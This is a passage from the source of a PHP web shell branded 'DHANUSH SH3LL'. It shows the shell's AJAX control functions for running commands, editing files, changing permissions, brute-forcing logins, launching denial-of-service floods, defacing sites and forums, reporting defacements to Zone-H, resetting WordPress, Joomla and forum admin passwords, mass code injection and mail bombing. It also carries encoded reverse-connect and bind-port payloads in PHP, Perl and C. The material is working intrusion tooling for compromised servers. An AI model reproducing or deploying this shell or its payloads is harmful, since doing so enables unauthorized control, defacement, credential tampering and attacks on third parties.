6545 document.getElementById("crdir").innerHTML=myurl;
6546 }
6547 }
6548
6549 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"="+mydir, true);
6550 ajaxRequest.send(null);
6551}
6552function getname(sitename)
6553{
6554 document.getElementById("showsite").innerHTML=waitstate;
6555 var ajaxRequest;
6556 ajaxRequest = new XMLHttpRequest();
6557
6558 ajaxRequest.onreadystatechange = function()
6559 {
6560 if(ajaxRequest.readyState == 4)
6561 {
6562 document.getElementById("showsite").innerHTML=ajaxRequest.responseText;
6563 }
6564 }
6565
6566 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?sitename="+sitename, true);
6567 ajaxRequest.send(null);
6568}
6569function myaction(myfileaction,chmode)
6570{
6571 var mytype = document.getElementsByName('actbox[]');
6572 var mychoice = new Array();
6573
6574 for (var i = 0, length = mytype.length; i < length; i++)
6575 {
6576 if (mytype[i].checked)
6577 mychoice[i] = mytype[i].value;
6578 }
6579
6580 var params = "choice="+myfileaction+"&chmode="+chmode+"&actbox[]="+mychoice;
6581
6582 document.getElementById("showmydata").className = "fixedbox";
6583 document.getElementById("showmydata").innerHTML=waitstate;
6584 var ajaxRequest;
6585 ajaxRequest = new XMLHttpRequest();
6586
6587 ajaxRequest.onreadystatechange = function()
6588 {
6589 if(ajaxRequest.readyState == 4)
6590 {
6591 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6592 }
6593 }
6594
6595 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6596 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6597 ajaxRequest.send(params);
6598}
6599function editdata()
6600{
6601 var result = "", // initialize list
6602 i,dbname,tablename;
6603 // iterate through arguments
6604 for (i = 1; i < arguments.length; i++)
6605 {
6606 if(i%2 == 0)
6607 result += arguments[i]+'=';
6608 else
6609 result += arguments[i]+'&';
6610 }
6611 result = result.slice(0, -1);
6612
6613 dbname = arguments[3];
6614 tablename = arguments[5];
6615 var result=result.replace(/dhanush_/g,"");
6616 var params = arguments[0]+"="+result;
6617
6618 document.getElementById("showsql").innerHTML=waitstate;
6619 var ajaxRequest;
6620 ajaxRequest = new XMLHttpRequest();
6621
6622 ajaxRequest.onreadystatechange = function()
6623 {
6624 if(ajaxRequest.readyState == 4)
6625 {
6626 viewtables('listTables',dbname,tablename);
6627 }
6628 }
6629
6630 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6631 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6632 ajaxRequest.send(params);
6633}
6634function viewtables(action,dbname,tablename,rowid,arrdata,executequery,fieldname,page)
6635{
6636 document.getElementById("showsql").innerHTML=waitstate;
6637 var ajaxRequest;
6638 ajaxRequest = new XMLHttpRequest();
6639
6640 ajaxRequest.onreadystatechange = function()
6641 {
6642 if(ajaxRequest.readyState == 4)
6643 {
6644 document.getElementById("showsql").innerHTML=ajaxRequest.responseText;
6645 }
6646 }
6647
6648 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?action="+action+"&dbname="+dbname+"&tablename="+tablename+"&"+rowid+"="+arrdata+"&executemyquery="+executequery+"&fieldname="+fieldname+"&page="+page, true);
6649 ajaxRequest.send(null);
6650}
6651function mydatabase(server,username,password)
6652{
6653 document.getElementById("showsql").innerHTML=waitstate;
6654 var ajaxRequest;
6655 ajaxRequest = new XMLHttpRequest();
6656
6657 ajaxRequest.onreadystatechange = function()
6658 {
6659 if(ajaxRequest.readyState == 4)
6660 {
6661 mydatago();
6662 }
6663 }
6664
6665 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?executeit&server="+server+"&username="+username+"&password="+password, true);
6666 ajaxRequest.send(null);
6667}
6668function mydatago()
6669{
6670 var ajaxRequest;
6671 ajaxRequest = new XMLHttpRequest();
6672
6673 ajaxRequest.onreadystatechange = function()
6674 {
6675 if(ajaxRequest.readyState == 4)
6676 {
6677 document.getElementById("datatable").style.display = 'none';
6678 document.getElementById("showsql").innerHTML=ajaxRequest.responseText;
6679 }
6680 }
6681
6682 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?mydata", true);
6683 ajaxRequest.send(null);
6684}
6685function bruteforce(prototype,serverport,login,dict)
6686{
6687 var mytype = document.getElementsByName('mytype');
6688 for (var i = 0, length = mytype.length; i < length; i++)
6689 {
6690 if (mytype[i].checked)
6691 break;
6692 }
6693 var getreverse = 0;
6694 if(document.getElementById('reverse').checked == true)
6695 getreverse = 1;
6696 else
6697 getreverse = 0;
6698
6699 document.getElementById("showbrute").innerHTML=waitstate;
6700 var ajaxRequest;
6701 ajaxRequest = new XMLHttpRequest();
6702
6703 ajaxRequest.onreadystatechange = function()
6704 {
6705 if(ajaxRequest.readyState == 4)
6706 {
6707 document.getElementById("showbrute").innerHTML=ajaxRequest.responseText;
6708 }
6709 }
6710
6711 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?prototype="+prototype+"&serverport="+serverport+"&login="+login+"&dict="+dict+"&type="+mytype[i].value+"&reverse="+getreverse, true);
6712 ajaxRequest.send(null);
6713}
6714function executemyfile(action,executepath,execute)
6715{
6716 document.getElementById("showmydata").className = "fixedbox";
6717 document.getElementById("showmydata").innerHTML=waitstate;
6718 var ajaxRequest;
6719 ajaxRequest = new XMLHttpRequest();
6720
6721 ajaxRequest.onreadystatechange = function()
6722 {
6723 if(ajaxRequest.readyState == 4)
6724 {
6725 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6726 }
6727 }
6728
6729 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+action+"&executepath="+executepath+"&execute="+execute, true);
6730 ajaxRequest.send(null);
6731}
6732function maindata(myaction,dir)
6733{
6734 document.getElementById("showmaindata").innerHTML=waitstate;
6735 var ajaxRequest;
6736 ajaxRequest = new XMLHttpRequest();
6737
6738 ajaxRequest.onreadystatechange = function()
6739 {
6740 if(ajaxRequest.readyState == 4)
6741 {
6742 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
6743 document.getElementById("showdir").innerHTML="";
6744 }
6745 }
6746
6747 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"="+myaction+"&dir="+dir, true);
6748 ajaxRequest.send(null);
6749}
6750function manuallyscriptfn(sctype,passwd)
6751{
6752 var message = encodeURIComponent(passwd);
6753 var params = sctype+"="+sctype+"&passwd="+passwd;
6754 document.getElementById("showdata").innerHTML=waitstate;
6755 var ajaxRequest;
6756 ajaxRequest = new XMLHttpRequest();
6757
6758 ajaxRequest.onreadystatechange = function()
6759 {
6760 if(ajaxRequest.readyState == 3)
6761 {
6762 document.getElementById("showdata").innerHTML=ajaxRequest.responseText;
6763 }
6764 }
6765
6766 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6767 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6768 ajaxRequest.send(params);
6769}
6770function my404page(message)
6771{
6772 var message = encodeURIComponent(message);
6773 var params = "404page=404page&message="+message;
6774 document.getElementById("showdata").innerHTML=waitstate;
6775 var ajaxRequest;
6776 ajaxRequest = new XMLHttpRequest();
6777
6778 ajaxRequest.onreadystatechange = function()
6779 {
6780 if(ajaxRequest.readyState == 4)
6781 {
6782 document.getElementById("showdata").innerHTML=ajaxRequest.responseText;
6783 }
6784 }
6785
6786 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6787 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6788 ajaxRequest.send(params);
6789}
6790function executemyfn(executepath,executemycmd)
6791{
6792 var ajaxRequest,app;
6793 ajaxRequest = new XMLHttpRequest();
6794
6795 ajaxRequest.onreadystatechange = function()
6796 {
6797 if(ajaxRequest.readyState == 4)
6798 {
6799 app = "$ " + executemycmd + " : " + ajaxRequest.responseText + "\n";
6800 document.getElementById("showexecute").innerHTML=app+document.getElementById("showexecute").innerHTML;
6801 }
6802 }
6803
6804 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?executepath="+executepath+"&executemycmd="+executemycmd, true);
6805 ajaxRequest.send(null);
6806}
6807function zoneh(defacer,hackmode,reason,domain)
6808{
6809 var domain = encodeURIComponent(domain);
6810 var params = "SendNowToZoneH=SendNowToZoneH&defacer="+defacer+"&hackmode="+hackmode+"&reason="+reason+"&domain="+domain;
6811 document.getElementById("showzone").innerHTML=waitstate;
6812 var ajaxRequest;
6813 ajaxRequest = new XMLHttpRequest();
6814
6815 ajaxRequest.onreadystatechange = function()
6816 {
6817 if(ajaxRequest.readyState == 4)
6818 {
6819 document.getElementById("showzone").innerHTML=ajaxRequest.responseText;
6820 }
6821 }
6822
6823 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6824 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6825 ajaxRequest.send(params);
6826}
6827function savemyfile(file,content)
6828{
6829 var content = encodeURIComponent(content);
6830 var params = "content="+content+"&file="+file;
6831 document.getElementById("showmydata").innerHTML=waitstate;
6832 document.getElementById("showdir").innerHTML="";
6833 var ajaxRequest;
6834 ajaxRequest = new XMLHttpRequest();
6835
6836 ajaxRequest.onreadystatechange = function()
6837 {
6838 if(ajaxRequest.readyState == 4)
6839 {
6840 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6841 }
6842 }
6843
6844 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6845 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6846 ajaxRequest.send(params);
6847}
6848function renamefun(file,to)
6849{
6850 document.getElementById("showmydata").innerHTML=waitstate;
6851 var ajaxRequest;
6852 ajaxRequest = new XMLHttpRequest();
6853
6854 ajaxRequest.onreadystatechange = function()
6855 {
6856 if(ajaxRequest.readyState == 4)
6857 {
6858 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6859 }
6860 }
6861
6862 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?renamemyfile&file="+file+"&to="+to, true);
6863 ajaxRequest.send(null);
6864}
6865function changeperms(chmode,myfilename)
6866{
6867 document.getElementById("showmydata").innerHTML=waitstate;
6868 var ajaxRequest;
6869 ajaxRequest = new XMLHttpRequest();
6870
6871 ajaxRequest.onreadystatechange = function()
6872 {
6873 if(ajaxRequest.readyState == 4)
6874 {
6875 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6876 }
6877 }
6878
6879 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?chmode="+chmode+"&myfilename="+myfilename, true);
6880 ajaxRequest.send(null);
6881}
6882function defacefun(deface)
6883{
6884 var ajaxRequest;
6885 ajaxRequest = new XMLHttpRequest();
6886
6887 ajaxRequest.onreadystatechange = function()
6888 {
6889 if(ajaxRequest.readyState == 4)
6890 {
6891 alert(ajaxRequest.responseText);
6892 }
6893 }
6894
6895 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?deface="+deface, true);
6896 ajaxRequest.send(null);
6897}
6898function cancel()
6899{
6900 document.getElementById("showmydata").className = "";
6901 document.getElementById("showmydata").innerHTML='';
6902}
6903function fileaction(myaction,myfilepath)
6904{
6905 document.getElementById("showmydata").className = "fixedbox";
6906 document.getElementById("showmydata").innerHTML=waitstate;
6907 var ajaxRequest;
6908 ajaxRequest = new XMLHttpRequest();
6909
6910 ajaxRequest.onreadystatechange = function()
6911 {
6912 if(ajaxRequest.readyState == 4)
6913 {
6914 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6915 }
6916 }
6917
6918 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"&myfilepath="+myfilepath, true);
6919 ajaxRequest.send(null);
6920}
6921function bypassfun(funct,functvalue,optiontype)
6922{
6923 document.getElementById("showmydata").className = "fixedbox";
6924 document.getElementById("showmydata").innerHTML=waitstate;
6925 var ajaxRequest;
6926 ajaxRequest = new XMLHttpRequest();
6927 ajaxRequest.onreadystatechange = function()
6928 {
6929 if(ajaxRequest.readyState == 4)
6930 {
6931 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6932 }
6933 }
6934
6935 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?bypassit&"+funct+"="+functvalue+"&optiontype="+optiontype, true);
6936 ajaxRequest.send(null);
6937}
6938function dos(target,ip,port,timeout,exTime,no0fBytes,multiplier)
6939{
6940 document.getElementById("showdos").innerHTML=waitstate;
6941 var ajaxRequest;
6942 ajaxRequest = new XMLHttpRequest();
6943
6944 ajaxRequest.onreadystatechange = function()
6945 {
6946 if(ajaxRequest.readyState == 4)
6947 {
6948 document.getElementById("showdos").innerHTML=ajaxRequest.responseText;
6949 }
6950 }
6951
6952 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+target+"&ip="+ip+"&port="+port+"&timeout="+timeout+"&exTime="+exTime+"&multiplier="+multiplier+"&no0fBytes="+no0fBytes, true);
6953 ajaxRequest.send(null);
6954}
6955function createfile(filecreator,filecontent)
6956{
6957 var mm = filecreator.slice(0, filecreator.lastIndexOf("<?php echo addslashes($directorysperator); ?>"));
6958 var filecontent = encodeURIComponent(filecontent);
6959 var params = "filecontent="+filecontent+"&filecreator="+filecreator;
6960 document.getElementById("showdir").innerHTML=waitstate;
6961 var ajaxRequest;
6962 ajaxRequest = new XMLHttpRequest();
6963
6964 ajaxRequest.onreadystatechange = function()
6965 {
6966 if(ajaxRequest.readyState == 4)
6967 {
6968 gethome('home',mm);
6969 document.getElementById("showdir").innerHTML=ajaxRequest.responseText;
6970 document.getElementById("showmydata").innerHTML="";
6971 }
6972 }
6973
6974 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6975 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6976 ajaxRequest.send(params);
6977}
6978function createdir(create,createfolder)
6979{
6980 document.getElementById("showmydata").className = "fixedbox";
6981 document.getElementById("showmydata").innerHTML=waitstate;
6982 var ajaxRequest;
6983 ajaxRequest = new XMLHttpRequest();
6984
6985 ajaxRequest.onreadystatechange = function()
6986 {
6987 if(ajaxRequest.readyState == 4)
6988 {
6989 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6990 }
6991 }
6992
6993 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+create+"="+createfolder, true);
6994 ajaxRequest.send(null);
6995}
6996function codeinsert(code)
6997{
6998 var code = encodeURIComponent(code);
6999 var params = "getcode="+code;
7000 document.getElementById("showcode").innerHTML=waitstate;
7001 var ajaxRequest;
7002
7003 ajaxRequest = new XMLHttpRequest();
7004
7005 ajaxRequest.onreadystatechange = function()
7006 {
7007 if(ajaxRequest.readyState == 4)
7008 {
7009 document.getElementById("showcode").innerHTML=ajaxRequest.responseText;
7010 }
7011 }
7012
7013 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
7014 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
7015 ajaxRequest.send(params);
7016}
7017function getmydefacedata(mydata)
7018{
7019 document.getElementById("showmydeface").innerHTML=waitstate;
7020 var ajaxRequest;
7021 ajaxRequest = new XMLHttpRequest();
7022
7023 ajaxRequest.onreadystatechange = function()
7024 {
7025 if(ajaxRequest.readyState == 4)
7026 {
7027 document.getElementById("showmydeface").innerHTML=ajaxRequest.responseText;
7028 }
7029 }
7030
7031 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+mydata, true);
7032 ajaxRequest.send(null);
7033}
7034function getmydata(mydata)
7035{
7036 document.getElementById("showmydata").className = "fixedbox";
7037 document.getElementById("showmydata").innerHTML=waitstate;
7038 var ajaxRequest;
7039 ajaxRequest = new XMLHttpRequest();
7040
7041 ajaxRequest.onreadystatechange = function()
7042 {
7043 if(ajaxRequest.readyState == 4)
7044 {
7045 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
7046 }
7047 }
7048
7049 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+mydata, true);
7050 ajaxRequest.send(null);
7051}
7052function getdata(mydata,myfile)
7053{
7054 document.getElementById("showdata").innerHTML=waitstate;
7055 var ajaxRequest;
7056 ajaxRequest = new XMLHttpRequest();
7057
7058 ajaxRequest.onreadystatechange = function()
7059 {
7060 if(ajaxRequest.readyState == 3)
7061 {
7062 document.getElementById("showdata").innerHTML=ajaxRequest.responseText;
7063 }
7064 }
7065
7066 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+mydata+"&myfile="+myfile, true);
7067 ajaxRequest.send(null);
7068}
7069function getport(host,protocol,start,end)
7070{
7071 document.getElementById("showports").innerHTML=waitstate;
7072 var ajaxRequest;
7073 ajaxRequest = new XMLHttpRequest();
7074
7075 ajaxRequest.onreadystatechange = function()
7076 {
7077 if(ajaxRequest.readyState == 4)
7078 {
7079 document.getElementById("showports").innerHTML=ajaxRequest.responseText;
7080 }
7081 }
7082
7083 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?host=" + host + "&protocol=" + protocol, true);
7084 ajaxRequest.send(null);
7085}
7086function changeforumpassword(forumpass,f1,f2,f3,f4,forums,tableprefix,ipbuid,newipbpass,username,newjoomlapass,uname,newpass)
7087{
7088 document.getElementById("showchangepass").innerHTML=waitstate;
7089 var ajaxRequest;
7090 ajaxRequest = new XMLHttpRequest();
7091
7092 ajaxRequest.onreadystatechange = function()
7093 {
7094 if(ajaxRequest.readyState == 4)
7095 {
7096 document.getElementById("showchangepass").innerHTML=ajaxRequest.responseText;
7097 }
7098 }
7099
7100 ajaxRequest.open("GET", "<?php echo $_SERVER['PHP_SELF']; ?>?forumpass&f1=" + f1 + "&f2=" + f2 + "&f3=" + f3 + "&f4=" + f4 + "&forums=" + forums + "&prefix=" + tableprefix + "&ipbuid=" + ipbuid + "&newipbpass=" + newipbpass + "&username=" + username + "&newjoomlapass=" + newjoomlapass + "&uname=" + uname + "&newpass=" + newpass, true);
7101 ajaxRequest.send(null);
7102}
7103function forumdefacefn(index,f1,f2,f3,f4,defaceforum,tableprefix,siteurl,head,f5)
7104{
7105 var index = encodeURIComponent(index);
7106 var params = "forumdeface="+defaceforum+"&index=" + index + "&f1=" + f1 + "&f2=" + f2 + "&f3=" + f3 + "&f4=" + f4 + "&tableprefix="+tableprefix+"&siteurl="+siteurl+"&head="+head+"&f5="+f5;
7107 document.getElementById("showdeface").innerHTML=waitstate;
7108 var ajaxRequest;
7109 ajaxRequest = new XMLHttpRequest();
7110
7111 ajaxRequest.onreadystatechange = function()
7112 {
7113 if(ajaxRequest.readyState == 4)
7114 {
7115 document.getElementById("showdeface").innerHTML=ajaxRequest.responseText;
7116 }
7117 }
7118
7119 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
7120 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
7121 ajaxRequest.send(params);
7122}
7123function codeinjector(pathtomass,mode,filetype,injectthis)
7124{
7125 var injectthis = encodeURIComponent(injectthis);
7126 var params = "pathtomass="+pathtomass+"&mode=" + mode + "&filetype=" + filetype + "&injectthis=" + injectthis;
7127 document.getElementById("showinject").innerHTML=waitstate;
7128 var ajaxRequest;
7129 ajaxRequest = new XMLHttpRequest();
7130
7131 ajaxRequest.onreadystatechange = function()
7132 {
7133 if(ajaxRequest.readyState == 3)
7134 {
7135 document.getElementById("showinject").innerHTML=ajaxRequest.responseText;
7136 }
7137 }
7138
7139 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
7140 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
7141 ajaxRequest.send(params);
7142}
7143function sendmail(mailfunction,to,subject,message,from,times,padding)
7144{
7145 var message = encodeURIComponent(message);
7146 if(mailfunction == "massmailing")
7147 var params = "mailfunction="+mailfunction+"&to="+to+"&subject="+subject+"&from=" + from + "&message=" + message;
7148 else if(mailfunction == "dobombing")
7149 var params = "mailfunction="+mailfunction+"&to="+to+"&subject="+subject+"×=" + times + "&padding=" + padding + "&message=" + message;
7150 document.getElementById("showmail").innerHTML=waitstate;
7151 var ajaxRequest;
7152 ajaxRequest = new XMLHttpRequest();
7153
7154 ajaxRequest.onreadystatechange = function()
7155 {
7156 if(ajaxRequest.readyState == 4)
7157 {
7158 document.getElementById("showmail").innerHTML=ajaxRequest.responseText;
7159 }
7160 }
7161
7162 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
7163 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
7164 ajaxRequest.send(params);
7165}
7166function execode(code)
7167{
7168 var intext = document.getElementById('intext').checked;
7169 var message = encodeURIComponent(message);
7170 var params = "code="+code+"&intext="+intext;
7171 document.getElementById("showresult").innerHTML=waitstate;
7172 var ajaxRequest;
7173 ajaxRequest = new XMLHttpRequest();
7174
7175 ajaxRequest.onreadystatechange = function()
7176 {
7177 if(ajaxRequest.readyState == 4)
7178 {
7179 document.getElementById("showresult").innerHTML=ajaxRequest.responseText;
7180 }
7181 }
7182
7183 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
7184 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
7185 ajaxRequest.send(params);
7186}
7187function malwarefun(malwork)
7188{
7189 var malpath = document.getElementById('createfile').value;
7190 document.getElementById("showmal").innerHTML="<center><marquee scrollamount=4 width=150>Wait....</marquee></center>";
7191 var ajaxRequest;
7192 ajaxRequest = new XMLHttpRequest();
7193
7194 ajaxRequest.onreadystatechange = function()
7195 {
7196 if(ajaxRequest.readyState == 4)
7197 {
7198 document.getElementById("showmal").innerHTML=ajaxRequest.responseText;
7199 }
7200 }
7201
7202 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+malwork+"&path="+malpath, true);
7203 ajaxRequest.send(null);
7204}
7205function getexploit(wurl,path,functiontype)
7206{
7207 document.getElementById("showexp").innerHTML=waitstate;
7208 var ajaxRequest;
7209 ajaxRequest = new XMLHttpRequest();
7210
7211 ajaxRequest.onreadystatechange = function()
7212 {
7213 if(ajaxRequest.readyState == 4)
7214 {
7215 document.getElementById("showexp").innerHTML=ajaxRequest.responseText;
7216 }
7217 }
7218
7219 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?uploadurl&wurl="+wurl+"&functiontype="+functiontype+"&path="+path, true);
7220 ajaxRequest.send(null);
7221}
7222function showMsg(msg)
7223{
7224 if(msg == 'smf')
7225 {
7226 document.getElementById('tableprefix').value="smf_";
7227 document.getElementById('fid').style.display='block';
7228 document.getElementById('wpress').style.display='none';
7229 document.getElementById('joomla').style.display='none';
7230 }
7231 if(msg == 'mybb')
7232 {
7233 document.getElementById('tableprefix').value="mybb_";
7234 document.getElementById('wpress').style.display='none';
7235 document.getElementById('joomla').style.display='none';
7236 document.getElementById('fid').style.display='block';
7237 }
7238 if(msg == 'ipb' || msg == 'vb')
7239 {
7240 document.getElementById('tableprefix').value="";
7241 document.getElementById('wpress').style.display='none';
7242 document.getElementById('joomla').style.display='none';
7243 document.getElementById('fid').style.display='block';
7244 }
7245 if(msg == 'wp')
7246 {
7247 document.getElementById('tableprefix').value="wp_";
7248 document.getElementById('wpress').style.display='block';
7249 document.getElementById('fid').style.display='none';
7250 document.getElementById('joomla').style.display='none';
7251 }
7252 if(msg == 'joomla')
7253 {
7254 document.getElementById('joomla').style.display='block';
7255 document.getElementById('tableprefix').value="jos_";
7256 document.getElementById('wpress').style.display='none';
7257 document.getElementById('fid').style.display='none';
7258 }
7259}
7260function checkforum(msg)
7261{
7262 if(msg == 'smf')
7263 {
7264 document.getElementById('tableprefix').value="smf_";
7265 document.getElementById('smfipb').style.display='block';
7266 document.getElementById('myjoomla').style.display='none';
7267
7268 }
7269 if(msg == 'phpbb')
7270 {
7271 document.getElementById('tableprefix').value="phpb_";
7272 document.getElementById('myjoomla').style.display='none';
7273 document.getElementById('smfipb').style.display='block';
7274
7275 }
7276 if(msg == 'mybb')
7277 {
7278 document.getElementById('tableprefix').value="mybb_";
7279 document.getElementById('myjoomla').style.display='none';
7280 document.getElementById('smfipb').style.display='none';
7281 }
7282 if(msg == 'vb')
7283 {
7284 document.getElementById('tableprefix').value="";
7285 document.getElementById('myjoomla').style.display='none';
7286 document.getElementById('smfipb').style.display='none';
7287 }
7288 if(msg == 'ipb')
7289 {
7290 document.getElementById('myjoomla').style.display='none';
7291 document.getElementById('smfipb').style.display='block';
7292 document.getElementById('tableprefix').value="";
7293 }
7294 if(msg == 'wp')
7295 {
7296 document.getElementById('tableprefix').value="wp_";
7297 document.getElementById('myjoomla').style.display='block';
7298 document.getElementById('smfipb').style.display='none';
7299 document.getElementById('siteurl').value="http://site/blog";
7300 }
7301 if(msg == 'joomla')
7302 {
7303 document.getElementById('myjoomla').style.display='block';
7304 document.getElementById('tableprefix').value="jos_";
7305 document.getElementById('smfipb').style.display='none';
7306 document.getElementById('siteurl').value="http://site/administrator/";
7307 }
7308}
7309</script>
7310<body>
7311<?php
7312
7313$back_connect_p="eNqlU01PwzAMvVfqfwjlkkpd94HEAZTDGENCCJC2cRrT1DUZCWvjqk5A/fcs3Rgg1gk0XxLnPT/bsnN60rZYthdKt4vKSNC+53sqL6A0BCuMCEK6EiYi4O52UZSQCkTHkoCGMMeKk/Llbdqd+V4dx4jShu7ee7PQ0TdCMQrDxTKxmTEqF2ANPe/U+LtUmSDdC98ja0NYOe1tTH3Qrde/md8+DCfR1h0/Du7m48lo2L8Pd7FxClqL1FDqqoxcWeE3FIXmNGBH2LMOfum1mu1aJtqibCY4vcs/Cg6AC06uKtIvX63+j+CxHe+pkLFxhUbkSi+BsU3eDQsw5rboUcdermergYZR5xDYPQT2DoFnn8OQIsvc4uw2NU6TLKPTwOokF0EUtJJgFu5r4wlFSRT/2UOznuJfOo2k+l+hdGnVmv4Bmanx6Q==";
7314
7315$backconnect_perl="eNqlUl9rwjAQfxf8Drcqa4UWt1dLZU7rJmN2tNWXTUps45qtJiVNGf32S9pOcSAI3kNI7vcnd9z1boZlwYdbQoc55llZYFh4o1HA4m8s7G6n2+kXVSHwHmQ4oNfMLSpSXYL9if80dR7kuZYvpW110LzmJMPPiCYZVplup6hRI/CmL25owts8WizVRSWiIPTdyasJn1jknAm2rSjaY0MXca4PBtI/ZpTi+ChXbihJeESooSpZv99vTCAUiwgJ9pe72wykuv6+EVpjVAq2k62mRg2wHFMjCGeLpQna+LZhaSeQtwrNM5Dr+/+hnBMqQHOuiA+q2Qcj63zMUkRlI+cJlxhNWYITeKxgwr9KeonRda01Vs1aGRqOUwaW5ThBnSB0xxzHsmwo1fzBQjYoin3grQrMjyyS2KfwjHC5JYxXDZ7/tAQ4fpTiLFMoqHm1dbRrrhat53rzX0SL2FA=";
7316
7317$bind_port_c="bZJRT9swEIDfK/U/eEVa7WJK0mkPrMukaoCEpnUT8DKVKjK2Q05LbMt2KGzw3+ekKQ0Zfkn83efL3TkHoHhRCYk+Oy9AT/Mvw8FBh1lQdz1YKQhuDyrpxe1/p0UBWwjKo5KBwvULs3ecIp4ziyaTsLkn6O9wgMKqo45yCvPtvnHM6kO0bkEoqOLB0fw3E8KmoJBtQ4LJUisc04jsZJQ0pvR4cZ5eLM+u6dWPr9/Sq+vLs8X3vQcZfucIstJXVqGjuMV26kClGSuheAyZ2hSvgkZbH0K518ph5jXgup1VvCbklVfXOnXNo9ULfLFcnJ5epovlr517C0pgRxHudYkm5L2lKHqIX0ouwhVIVcsfd2iTQyFx/DLLZn4J41waH8Ro328zrcrMMH+TxW+wWZdtLHgZ4Ognc26jrfg0oiddwUomQtxQB3+kzrAh3WimLYYkmkP9exWhC0PmcHhI9kZ7KQibFaxRkqDxjRoT9PTUJTaQ3pl6bYUQj8adb0LWTJWXZntDszU1pM4T9VK4xzDYEo+Ow2UcuxwdwahbOy+0C63v0PNw8PwP";
7318
7319$bind_port_p="bZFvS8NADMZft9DvkNUxW6hsw5f+wbJVHc5WelUQldK1mTucd6W94cTtu3tpN1DxXS753ZMnyUGnv6qr/oyLfonV0jK77DqYTs/sJlUv4IjbJ5bJ5+Bc+PHVA5zC0IUvwDVXztA9ga1lrmoEJvM3VJqsm8BhXu/uMp2EQeL1WDS6SVkSB/6t94qqrKSSs0+RvaNzqPLy0HVhs4GCI9ijTCjIK8wUQqv0LKh/jYqesiRlFk1T0tTaLErj4J4F/ngce9qOZWrbhWaIzoqiSrlwumT8afDiTULiUj98/NtSliiglNWu3ZLXCoWWOf7DtYUf5MeCL9GhlVimkeU5aoejKAw9RmYMPnc6TrfkxdlcVm9uixl7PSEVUN4G2m+nwDkXWADxzW+jscWS8ST07NMe6dq/8tF94tnn/xSCOP5dwDXm0N52P1FZcT0RIbvhiFnpxbdYO59h5Eup70vYTogrGFCoL7/9Bg==";
7320
7321echo $shellstyle;
7322?>
7323<table style="width:100%;">
7324<tr align="right">
7325<td><a href="<?php echo $self;?>"><font size="6" style="text-decoration:none;" face="Times New Roman, Times, serif">DHANUSH SH3LL </font></a>
7326</td><td align="right">
7327<form method="get">
7328<select id="style" class="sbox" onChange="change_style(this.value)">
7329<option selected="selected">--Style--</option>
7330<option value="dhanush">Dhanush</option>
7331<option value="404">404</option>
